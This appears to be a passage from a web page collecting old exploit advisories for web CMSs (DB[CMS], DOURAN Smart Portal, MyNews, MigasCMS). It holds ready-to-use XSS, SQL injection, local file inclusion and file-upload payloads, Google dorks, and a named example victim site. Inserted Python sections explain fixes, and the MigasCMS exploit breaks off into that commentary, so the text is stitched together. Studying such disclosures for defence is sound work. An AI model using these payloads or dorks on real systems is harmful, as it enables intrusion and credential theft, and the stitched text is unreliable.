User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; msn OptimizedIE8;ZHCN)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 1.1.1.1
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=abc7CGMIyBwpNgFko8MIs



digest_username=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22&digest_password1=&digest_password2=&digest_realm=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22&digest_attempt=true




References : http://securityreason.com/wlb_show/WLB-2010050108
 

DB[CMS] 2.01 remote SQL injection

Text : 


# Exploit Title: DB[CMS] Sql Injection Vulnerability
# Author: Pokeng
# Software Link: http://www.debliteck.com/how.php

# Version: Ver2.01
# Platform / Tested on: Win/Linux
# category: webapps/0day
# Code : http://[site]/article.php?id=[SQL]
# Dork : "Designed and Developed by Debliteck Ltd"

//Now I'm Just Alone In The Dark T_T

//Very Thank's For My brother Who Always Give Me Support By The Good
Way = N4ck0 And Aury

Please accept my submission Mr.Admin ^_^





References : http://securityreason.com/wlb_show/WLB-2010050107
 

DOURAN Smart Portal remote file upload

Text : 

# Exploit Title: (DOURAN Smart Portal) remote file upload
# Author: (black intelligence)
# Software Link: http://smartdouran.com
# Version: [DOURAN Smart Portal V1.7.0.0 ]
# Platform : windows/asp.net
# category: remote
#
# Exploit: http://target.com
# http://target.com/DesktopModules/fck/editor/filemanager/upload/test.html
#
# example site: edukaraj3.ir/
# Select the "File Uploader" to use = asp.net
# http://edukaraj3.ir/DesktopModules/fck/editor/filemanager/upload/test.html
#
# (: filtering110@gmail.com,ahmad_behzadi70@yahoo.com :)
#
# google dork = "DOURAN Smart Portal"
 

MyNews v1.0 CMS Sql Injection, local file inclusion and XSS Vulnerabilities

Text : 

MyNews v1.0 CMS - Sql Injection, local file inclusion and XSS Vulnerabilities
Found by: mr_me - http://net-ninja.net/
Advisory: http://www.corelan.be:8800/advisories.php?id=10-040
Dork: "Corelan Security Team"
Homepage: http://mynews.magtrb.com/
Download:
http://mynews.magtrb.com/download.php?fname=upload/Versions/MyNews+v1.0.zip

Greetz: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
Notes:
- Provided 'as is', without any warranty.
- Use for educational purposes only.
- Do not use this to do anything illegal !
- Corelan cannot be held responsible for any damages this may cause.

******************
Sql Injection PoC:
******************

-------[ SNIP ]----------> article.php, line 10
$sql_query = "select id, title, text, views from ".$prefix."_news where id=".$_GET[id]."";
-------[ EOF SNIP ]------>

http://[server]/MyNews/index.php?act=article&id=[ SQLI ]
http://[server]/MyNews/index.php?act=article&id=-12+union+select+1,2,concat(name,0x3a,pwd),4+from+_authors--

********************
File Inclusion PoCs:
********************

-------[ SNIP ]----------> index.php, line 18
if (!isset($_GET['act'])) { $act = 'news'; } else { $act = $_GET['act']; }

include('./includes/header.php');
require('./includes/'.$act.'.php');
-------[ EOF SNIP ]------>

-------[ SNIP ]----------> admin.php, line 65
if(!isset($act)){$act ="index"; }

if($act){include("includes/admin/$act.php");
$smarty->assign("act", $act);
}
-------[ EOF SNIP ]------>

1:
http://[server]/MyNews/index.php?act=[ LFI ]&id=12
http://[server]/MyNews/index.php?act=../../../../etc/passwd&id=12

2 (requires authentication):
http://[server]/MyNews/admin.php?act=[ LFI ]
http://[server]/MyNews/admin.php?act=../../../../etc/passwd

*******************
Reflective XSS PoC:
*******************

http://[server]/MyNews/admin.php?act=

______________________________________________________________________________
EOF
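The two include sites in MyNews (`index.php` line 18 and `admin.php` line 65) and the `$q`/`tpldir` routing in yupana earlier on this page share one shape: a request parameter is spliced into a filesystem path and handed to `require`/`include`. The following is an added example, not code from either project, showing in Python the check a fix needs: an allowlist of the action names the application actually ships, plus a canonicalised containment test as defence in depth, run against the traversal string from the PoC. `INCLUDE_DIR`, `ALLOWED_ACTIONS` and the function names are assumptions for the demonstration.

```python
import posixpath

# Assumed install layout and action modules (constructed for the demonstration).
INCLUDE_DIR = "/var/www/MyNews/includes"
ALLOWED_ACTIONS = {"news", "article", "search"}


def resolve_include_unsafe(act):
    """What index.php line 18 effectively does: concatenate, never validate."""
    return "./includes/" + act + ".php"


def within_base(candidate, base=INCLUDE_DIR):
    """Canonicalise base/candidate and require the result to stay under base.
    A plain startswith() on the string is not enough: '/var/www/MyNews/includes-old'
    starts with base, so compare whole path components via commonpath instead."""
    full = posixpath.normpath(posixpath.join(base, candidate))
    return posixpath.commonpath([base, full]) == base


def resolve_include_safe(act, base=INCLUDE_DIR, allowed=ALLOWED_ACTIONS):
    """Allowlist first, containment second. Returns the path to include, or
    None when the request must be refused. The allowlist also closes the
    old-PHP null-byte trick (act=../../etc/passwd%00 truncating '.php'),
    because the value is matched whole before any path is built."""
    if act not in allowed:
        return None
    rel = act + ".php"
    if not within_base(rel, base):
        return None
    return posixpath.normpath(posixpath.join(base, rel))


if __name__ == "__main__":
    poc = "../../../../etc/passwd"           # the advisory's LFI payload
    print("unsafe :", resolve_include_unsafe(poc))
    print("safe   :", resolve_include_safe(poc))
    print("safe   :", resolve_include_safe("news"))
    print("within :", within_base("../includes-old/x.php"))
```

`within_base` is kept separate from the allowlist because it is the piece you can bolt onto code that cannot easily enumerate its modules (a template directory like yupana's `tpldir`), while the allowlist is the check that actually makes the parameter harmless.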
 

MigasCMS 1.0 SQL Injection

Text : 

##########################################################
#Title: MigasCMS 1.0 SQL Injection
#Download: http://www.sebrac.webcindario.com/cms/
##########################################################
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Original Advisory:
http://www.itsecteam.com/en/vulnerabilities/vulnerability54.htm
#Thanks: r3dm0v3,M3hr@n.s ,pejvak, am!rkh@n
##########################################################

#DESCRIPTION (by vendor):#################################
A small but complete cms for blogs, and personal page, with file manager
and download area.

#BUG:#####################################################
file: function.php, lines 365-369:

if(isset($_POST['submit'])){
    $categ = ($_REQUEST['categorie']);
    $query="Select * from sbc_links where idlink>0 and category = '$categ'" or die();
}
$result= mysql_query($query);

#EXPLOIT:#################################################
magic quotes must be off
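Every SQL injection post on this page (runt-communications, DBCart, WebJaxe, MyNews `article.php`, DB[CMS] and MigasCMS `function.php`) is the same defect: a request parameter concatenated into a query string. The following is an added example, not code from any of those projects, that reproduces both shapes in Python against an in-memory SQLite database: MyNews's unquoted numeric `id` with the advisory's UNION payload (SQLite's `||` stands in for MySQL's `concat(..., 0x3a, ...)`), and MigasCMS's single-quoted `category` string, where the "magic quotes must be off" condition applies, each beside the parameterised query that closes the hole. Table contents, column names and the function names are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the tables the advisories query; every row is
    constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE _news(id INTEGER, title TEXT, text TEXT, views INTEGER);
        CREATE TABLE _authors(name TEXT, pwd TEXT);
        CREATE TABLE sbc_links(idlink INTEGER, category TEXT, url TEXT);
        INSERT INTO _news VALUES (12, 'Hello', 'first post', 3);
        INSERT INTO _authors VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO sbc_links VALUES (1, 'public', 'http://example.invalid/a');
        INSERT INTO sbc_links VALUES (2, 'private', 'http://example.invalid/b');
    """)
    return db


# --- numeric context: MyNews article.php line 10 ------------------------------
def article_vulnerable(db, id_param):
    """Untrusted $_GET[id] pasted straight after 'id=' (no quote to escape,
    so magic_quotes_gpc would not help here)."""
    sql = "select id, title, text, views from _news where id=" + id_param
    return db.execute(sql).fetchall()


def article_safe(db, id_param):
    """Same query with a bound parameter: the input can only ever be a value."""
    sql = "select id, title, text, views from _news where id=?"
    return db.execute(sql, (id_param,)).fetchall()


# --- string context: MigasCMS function.php line 367 ---------------------------
def links_vulnerable(db, categ):
    """$_REQUEST['categorie'] inside single quotes; with magic_quotes_gpc off a
    quote in the input ends the literal early."""
    sql = ("select * from sbc_links where idlink>0 and category = '"
           + categ + "'")
    return db.execute(sql).fetchall()


def links_safe(db, categ):
    sql = "select * from sbc_links where idlink>0 and category = ?"
    return db.execute(sql, (categ,)).fetchall()


# The MyNews PoC rewritten for SQLite: '||' replaces MySQL's concat() and the
# 0x3a hex literal; '--' comments out the rest of the statement in both
# dialects (MySQL requires whitespace after the two dashes).
UNION_PAYLOAD = "-12 union select 1,2,name||':'||pwd,4 from _authors--"
# Classic quoted-context payload for the MigasCMS case.
QUOTE_PAYLOAD = "' or '1'='1"


if __name__ == "__main__":
    db = make_db()
    print("article vulnerable   :", article_vulnerable(db, UNION_PAYLOAD))
    print("article parameterised:", article_safe(db, UNION_PAYLOAD))
    print("links vulnerable     :", links_vulnerable(db, QUOTE_PAYLOAD))
    print("links parameterised  :", links_safe(db, QUOTE_PAYLOAD))
```

The parameterised versions return the same rows for legitimate input (`article_safe(db, "12")` still finds the article) and nothing at all for the payloads, which is the behaviour to test for when verifying a fix: escaping or magic quotes change what the payload looks like, binding changes what it can do.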